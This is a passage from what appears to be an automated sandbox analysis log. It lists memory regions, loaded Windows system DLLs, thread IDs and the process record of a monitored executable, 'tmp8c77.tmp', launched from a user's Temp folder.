Region:
	              id = 1002
	        start_va = 0x75070000
	          end_va = 0x7511cfff
	     entry_point = 0x75070000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 1003
	        start_va = 0x765a0000
	          end_va = 0x7667ffff
	     entry_point = 0x765a0000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1004
	        start_va = 0x76f00000
	          end_va = 0x7704efff
	     entry_point = 0x76f00000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 1005
	        start_va = 0x772e0000
	          end_va = 0x7730afff
	     entry_point = 0x772e0000
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 1006
	        start_va = 0x773a0000
	          end_va = 0x773f7fff
	     entry_point = 0x773a0000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 1007
	        start_va = 0x774c0000
	          end_va = 0x7763dfff
	     entry_point = 0x774c0000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 1008
	        start_va = 0x77640000
	          end_va = 0x7775efff
	     entry_point = 0x77640000
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")

Region:
	              id = 1009
	        start_va = 0x77810000
	          end_va = 0x77956fff
	     entry_point = 0x77810000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 1010
	        start_va = 0x77960000
	          end_va = 0x77adafff
	     entry_point = 0x77960000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 1011
	        start_va = 0x7ed10000
	          end_va = 0x7ee0ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ed10000"
	        filename = ""

Region:
	              id = 1012
	        start_va = 0x7ee10000
	          end_va = 0x7ee32fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ee10000"
	        filename = ""

Region:
	              id = 1013
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1014
	        start_va = 0x7fff0000
	          end_va = 0x7ffc1562ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 1015
	        start_va = 0x7ffc15630000
	          end_va = 0x7ffc157f0fff
	     entry_point = 0x7ffc15630000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1016
	        start_va = 0x7ffc157f1000
	          end_va = 0x7ffffffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffc157f1000"
	        filename = ""

Region:
	              id = 1028
	        start_va = 0x500000
	          end_va = 0x500fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000500000"
	        filename = ""

Region:
	              id = 1029
	        start_va = 0x510000
	          end_va = 0x510fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000510000"
	        filename = ""

Region:
	              id = 1045
	        start_va = 0x520000
	          end_va = 0x537fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000520000"
	        filename = ""

Region:
	              id = 1046
	        start_va = 0x700000
	          end_va = 0x700fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000700000"
	        filename = ""

Region:
	              id = 1047
	        start_va = 0x710000
	          end_va = 0x710fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000710000"
	        filename = ""


Thread:
	id = 58
	os_tid = 0x14c


Thread:
	id = 59
	os_tid = 0xc44


Process:
	id = "9"
	image_name = "tmp8c77.tmp"
	filename = "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\tmp8c77.tmp"
	page_root = "0x58c38000"
	os_pid = "0xe6c"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "6"
	os_parent_pid = "0xdb0"
	cmd_line = "\"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp\" --reinstall"
	cur_dir = "C:\\Users\\Nd9E1FYi\\Desktop\\"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f009" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1261
	        start_va = 0x10000
	          end_va = 0x2ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 1262
	        start_va = 0x30000
	          end_va = 0x31fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000030000"
	        filename = ""

Region:
	              id = 1263
	        start_va = 0x40000
	          end_va = 0x54fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000040000"
	        filename = ""

Region:
	              id = 1264
	        start_va = 0x60000
	          end_va = 0x9ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000060000"
	        filename = ""

Region:
	              id = 1265
	        start_va = 0xa0000
	          end_va = 0x19ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000a0000"
	        filename = ""

Region:
	              id = 1266
	        start_va = 0x1a0000
	          end_va = 0x1a3fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 1267
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 1268
	        start_va = 0x200000
	          end_va = 0x3fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 1269
	        start_va = 0x400000
	          end_va = 0x43efff
	     entry_point = 0x400000
	     region_type = mapped_file
	            name = "tmp8c77.tmp"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\tmp8c77.tmp")

Region:
	              id = 1270
	        start_va = 0x77960000
	          end_va = 0x77adafff
	     entry_point = 0x77960000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 1271
	        start_va = 0x7ffb0000
	          end_va = 0x7ffd2fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ffb0000"
	        filename = ""

Region:
	              id = 1272
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1273
	        start_va = 0x7fff0000
	          end_va = 0x7ffc1562ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 1274
	        start_va = 0x7ffc15630000
	          end_va = 0x7ffc157f0fff
	     entry_point = 0x7ffc15630000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1275
	        start_va = 0x7ffc157f1000
	          end_va = 0x7ffffffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffc157f1000"
	        filename = ""

Region:
	              id = 1279
	        start_va = 0x600000
	          end_va = 0x60ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000600000"
	        filename = ""

Region:
	              id = 1280
	        start_va = 0x55c00000
	          end_va = 0x55c79fff
	     entry_point = 0x55c00000
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 1281
	        start_va = 0x55c90000
	          end_va = 0x55cdffff
	     entry_point = 0x55c90000
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 1282
	        start_va = 0x55c80000
	          end_va = 0x55c87fff
	     entry_point = 0x55c80000
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 1283
	        start_va = 0x10000
	          end_va = 0x1ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 1284
	        start_va = 0x440000
	          end_va = 0x4fdfff
	     entry_point = 0x440000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1285
	        start_va = 0x7e0000
	          end_va = 0x8dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007e0000"
	        filename = ""

Region:
	              id = 1286
	        start_va = 0x765a0000
	          end_va = 0x7667ffff
	     entry_point = 0x765a0000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1287
	        start_va = 0x774c0000
	          end_va = 0x7763dfff
	     entry_point = 0x774c0000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 1288
	        start_va = 0x7feb0000
	          end_va = 0x7ffaffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007feb0000"
	        filename = ""

Region:
	              id = 1289
	        start_va = 0x745e0000
	          end_va = 0x74671fff
	     entry_point = 0x745e0000
	     region_type = mapped_file
	            name = "apphelp.dll"
	        filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")

Region:
	              id = 1294
	        start_va = 0x20000
	          end_va = 0x23fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 1295
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 1296
	        start_va = 0x500000
	          end_va = 0x5fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000500000"
	        filename = ""

Region:
	              id = 1297
	        start_va = 0x6fbe0000
	          end_va = 0x6fbe7fff
	     entry_point = 0x6fbe0000
	     region_type = mapped_file
	            name = "dsrole.dll"
	        filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll")

Region:
	              id = 1298
	        start_va = 0x6fbf0000
	          end_va = 0x6fc98fff
	     entry_point = 0x6fbf0000
	     region_type = mapped_file
	            name = "dsuiext.dll"
	        filename = "\\Windows\\SysWOW64\\dsuiext.dll" (normalized: "c:\\windows\\syswow64\\dsuiext.dll")

Region:
	              id = 1299
	        start_va = 0x6fca0000
	          end_va = 0x6fcdafff
	     entry_point = 0x6fca0000
	     region_type = mapped_file
	            name = "activeds.dll"
	        filename = "\\Windows\\SysWOW64\\activeds.dll" (normalized: "c:\\windows\\syswow64\\activeds.dll")

Region:
	              id = 1300
	        start_va = 0x6fce0000
	          end_va = 0x6fcfbfff
	     entry_point = 0x6fce0000
	     region_type = mapped_file
	            name = "ntdsapi.dll"
	        filename = "\\Windows\\SysWOW64\\ntdsapi.dll" (normalized: "c:\\windows\\syswow64\\ntdsapi.dll")

Region:
	              id = 1301
	        start_va = 0x6fd00000
	          end_va = 0x6fd17fff
	     entry_point = 0x6fd00000
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 1302
	        start_va = 0x6fd20000
	          end_va = 0x6fd45fff
	     entry_point = 0x6fd20000
	     region_type = mapped_file
	            name = "odbctrac.dll"
	        filename = "\\Windows\\SysWOW64\\odbctrac.dll" (normalized: "c:\\windows\\syswow64\\odbctrac.dll")

Region:
	              id = 1303
	        start_va = 0x6fd50000
	          end_va = 0x6fd76fff
	     entry_point = 0x6fd50000
	     region_type = mapped_file
	            name = "dsprop.dll"
	        filename = "\\Windows\\SysWOW64\\dsprop.dll" (normalized: "c:\\windows\\syswow64\\dsprop.dll")

Region:
	              id = 1304
	        start_va = 0x6ff90000
	          end_va = 0x6ff99fff
	     entry_point = 0x6ff90000
	     region_type = mapped_file
	            name = "netutils.dll"
	        filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll")

Region:
	              id = 1305
	        start_va = 0x6ffa0000
	          end_va = 0x6ffe9fff
	     entry_point = 0x6ffa0000
	     region_type = mapped_file
	            name = "eappcfg.dll"
	        filename = "\\Windows\\SysWOW64\\eappcfg.dll" (normalized: "c:\\windows\\syswow64\\eappcfg.dll")

Region:
	              id = 1306
	        start_va = 0x71d30000
	          end_va = 0x71d5efff
	     entry_point = 0x71d30000
	     region_type = mapped_file
	            name = "iphlpapi.dll"
	        filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")

Region:
	              id = 1307
	        start_va = 0x72190000
	          end_va = 0x721befff
	     entry_point = 0x72190000
	     region_type = mapped_file
	            name = "logoncli.dll"
	        filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll")

Region:
	              id = 1308
	        start_va = 0x74680000
	          end_va = 0x74689fff
	     entry_point = 0x74680000
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 1309
	        start_va = 0x74690000
	          end_va = 0x746adfff
	     entry_point = 0x74690000
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 1310
	        start_va = 0x746c0000
	          end_va = 0x7471efff
	     entry_point = 0x746c0000
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 1311
	        start_va = 0x74720000
	          end_va = 0x74763fff
	     entry_point = 0x74720000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 1312
	        start_va = 0x74770000
	          end_va = 0x747b3fff
	     entry_point = 0x74770000
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")

Region:
	              id = 1313
	        start_va = 0x747c0000
	          end_va = 0x7487dfff
	     entry_point = 0x747c0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 1314
	        start_va = 0x74880000
	          end_va = 0x74a3cfff
	     entry_point = 0x74880000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 1315
	        start_va = 0x74aa0000
	          end_va = 0x74b1afff
	     entry_point = 0x74aa0000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 1316
	        start_va = 0x74b20000
	          end_va = 0x74b64fff
	     entry_point = 0x74b20000
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 1317
	        start_va = 0x74b70000
	          end_va = 0x75068fff
	     entry_point = 0x74b70000
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")

Region:
	              id = 1318
	        start_va = 0x75070000
	          end_va = 0x7511cfff
	     entry_point = 0x75070000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 1319
	        start_va = 0x75120000
	          end_va = 0x7651efff
	     entry_point = 0x75120000
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")

Region:
	              id = 1320
	        start_va = 0x766e0000
	          end_va = 0x766eefff
	     entry_point = 0x766e0000
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")

Region:
	              id = 1321
	        start_va = 0x76b60000
	          end_va = 0x76bf1fff
	     entry_point = 0x76b60000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 1322
	        start_va = 0x76ec0000
	          end_va = 0x76ef6fff
	     entry_point = 0x76ec0000
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")

Region:
	              id = 1323
	        start_va = 0x76f00000
	          end_va = 0x7704efff
	     entry_point = 0x76f00000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 1324
	        start_va = 0x771d0000
	          end_va = 0x772bafff
	     entry_point = 0x771d0000
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 1325
	        start_va = 0x773a0000
	          end_va = 0x773f7fff
	     entry_point = 0x773a0000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 1326
	        start_va = 0x77400000
	          end_va = 0x7748cfff
	     entry_point = 0x77400000
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")

Region:
	              id = 1327
	        start_va = 0x77760000
	          end_va = 0x7776bfff
	     entry_point = 0x77760000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 1328
	        start_va = 0x77810000
	          end_va = 0x77956fff
	     entry_point = 0x77810000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 1366
	        start_va = 0x6fb00000
	          end_va = 0x6fb37fff
	     entry_point = 0x6fb00000
	     region_type = mapped_file
	            name = "adsldpc.dll"
	        filename = "\\Windows\\SysWOW64\\adsldpc.dll" (normalized: "c:\\windows\\syswow64\\adsldpc.dll")

Region:
	              id = 1367
	        start_va = 0x6fb40000
	          end_va = 0x6fbd8fff
	     entry_point = 0x6fb40000
	     region_type = mapped_file
	            name = "odbc32.dll"
	        filename = "\\Windows\\SysWOW64\\odbc32.dll" (normalized: "c:\\windows\\syswow64\\odbc32.dll")

Region:
	              id = 1368
	        start_va = 0x76680000
	          end_va = 0x766d2fff
	     entry_point = 0x76680000
	     region_type = mapped_file
	            name = "wldap32.dll"
	        filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll")

Region:
	              id = 1369
	        start_va = 0x610000
	          end_va = 0x64ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000610000"
	        filename = ""

Region:
	              id = 1370
	        start_va = 0x650000
	          end_va = 0x74ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000650000"
	        filename = ""

Region:
	              id = 1371
	        start_va = 0x6fa40000
	          end_va = 0x6fa55fff
	     entry_point = 0x6fa40000
	     region_type = mapped_file
	            name = "mpr.dll"
	        filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll")

Region:
	              id = 1372
	        start_va = 0x6fa60000
	          end_va = 0x6faf1fff
	     entry_point = 0x6fa60000
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")

Region:
	              id = 1373
	        start_va = 0x70090000
	          end_va = 0x70097fff
	     entry_point = 0x70090000
	     region_type = mapped_file
	            name = "dpapi.dll"
	        filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll")

Region:
	              id = 1442
	        start_va = 0x30000
	          end_va = 0x30fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000030000"
	        filename = ""

Region:
	              id = 1443
	        start_va = 0x750000
	          end_va = 0x750fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000750000"
	        filename = ""

Region:
	              id = 1444
	        start_va = 0x760000
	          end_va = 0x761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000760000"
	        filename = ""

Region:
	              id = 1445
	        start_va = 0x7a0000
	          end_va = 0x7affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007a0000"
	        filename = ""

Region:
	              id = 1446
	        start_va = 0x8e0000
	          end_va = 0xa67fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000008e0000"
	        filename = ""

Region:
	              id = 1447
	        start_va = 0xa70000
	          end_va = 0xbf0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000a70000"
	        filename = ""

Region:
	              id = 1448
	        start_va = 0xc00000
	          end_va = 0x1ffffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000c00000"
	        filename = ""

Region:
	              id = 1449
	        start_va = 0x21b0000
	          end_va = 0x21bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000021b0000"
	        filename = ""

Region:
	              id = 1450
	        start_va = 0x6f830000
	          end_va = 0x6fa3efff
	     entry_point = 0x6f830000
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll")

Region:
	              id = 1451
	        start_va = 0x772e0000
	          end_va = 0x7730afff
	     entry_point = 0x772e0000
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 1452
	        start_va = 0x770000
	          end_va = 0x771fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000770000"
	        filename = ""

Region:
	              id = 1453
	        start_va = 0x780000
	          end_va = 0x781fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000780000"
	        filename = ""

Region:
	              id = 1454
	        start_va = 0x790000
	          end_va = 0x793fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000790000"
	        filename = ""

Region:
	              id = 1455
	        start_va = 0x7b0000
	          end_va = 0x7b0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007b0000"
	        filename = ""

Region:
	              id = 1456
	        start_va = 0x7c0000
	          end_va = 0x7c0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007c0000"
	        filename = ""

Region:
	              id = 1457
	        start_va = 0x2000000
	          end_va = 0x2032fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002000000"
	        filename = ""

Region:
	              id = 1458
	        start_va = 0x702b0000
	          end_va = 0x704bcfff
	     entry_point = 0x702b0000
	     region_type = mapped_file
	            name = "wininet.dll"
	        filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll")

Region:
	              id = 1459
	        start_va = 0x772c0000
	          end_va = 0x772c5fff
	     entry_point = 0x772c0000
	     region_type = mapped_file
	            name = "psapi.dll"
	        filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")

Region:
	              id = 1460
	        start_va = 0x701e0000
	          end_va = 0x701f8fff
	     entry_point = 0x701e0000
	     region_type = mapped_file
	            name = "userenv.dll"
	        filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll")

Region:
	              id = 1461
	        start_va = 0x70210000
	          end_va = 0x702aafff
	     entry_point = 0x70210000
	     region_type = mapped_file
	            name = "winhttp.dll"
	        filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll")

Region:
	              id = 1462
	        start_va = 0x77490000
	          end_va = 0x774a2fff
	     entry_point = 0x77490000
	     region_type = mapped_file
	            name = "netapi32.dll"
	        filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll")

Region:
	              id = 1463
	        start_va = 0x6ff70000
	          end_va = 0x6ff84fff
	     entry_point = 0x6ff70000
	     region_type = mapped_file
	            name = "samcli.dll"
	        filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll")

Region:
	              id = 1466
	        start_va = 0x6ff60000
	          end_va = 0x6ff69fff
	     entry_point = 0x6ff60000
	     region_type = mapped_file
	            name = "secur32.dll"
	        filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll")

Region:
	              id = 1469
	        start_va = 0x2040000
	          end_va = 0x207ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002040000"
	        filename = ""

Region:
	              id = 1470
	        start_va = 0x2080000
	          end_va = 0x217ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002080000"
	        filename = ""

Region:
	              id = 1471
	        start_va = 0x21c0000
	          end_va = 0x24f6fff
	     entry_point = 0x21c0000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 1473
	        start_va = 0x7d0000
	          end_va = 0x7dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1474
	        start_va = 0x2500000
	          end_va = 0x253ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002500000"
	        filename = ""

Region:
	              id = 1475
	        start_va = 0x2540000
	          end_va = 0x263ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002540000"
	        filename = ""

Region:
	              id = 1476
	        start_va = 0x2640000
	          end_va = 0x273ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002640000"
	        filename = ""

Region:
	              id = 1477
	        start_va = 0x2180000
	          end_va = 0x2197fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002180000"
	        filename = ""

Region:
	              id = 1478
	        start_va = 0x7d0000
